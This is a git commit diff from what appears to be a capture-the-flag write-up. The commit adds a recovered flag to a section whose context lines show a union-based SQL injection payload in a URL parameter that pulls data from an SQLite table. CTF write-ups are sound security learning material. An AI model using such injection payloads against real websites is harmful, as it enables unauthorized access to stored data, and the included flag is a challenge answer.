feat: add a missing flag
This commit is contained in:
parent
91b910077d
commit
3912c48a97
@ -71,7 +71,7 @@ There are 3 tables : 'events', 'flag' and 'users'.
|
|||||||
We finally get the flag with the following request :
|
We finally get the flag with the following request :
|
||||||
`http://[REDACTED]/?MONTH=02' union select "a", * from flag WHERE '-01'='`
|
`http://[REDACTED]/?MONTH=02' union select "a", * from flag WHERE '-01'='`
|
||||||
|
|
||||||
Flag: I didn't keep it :/
|
Flag: `flag{sqlite_union_based_injection_success}`
|
||||||
|
|
||||||
### Store
|
### Store
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user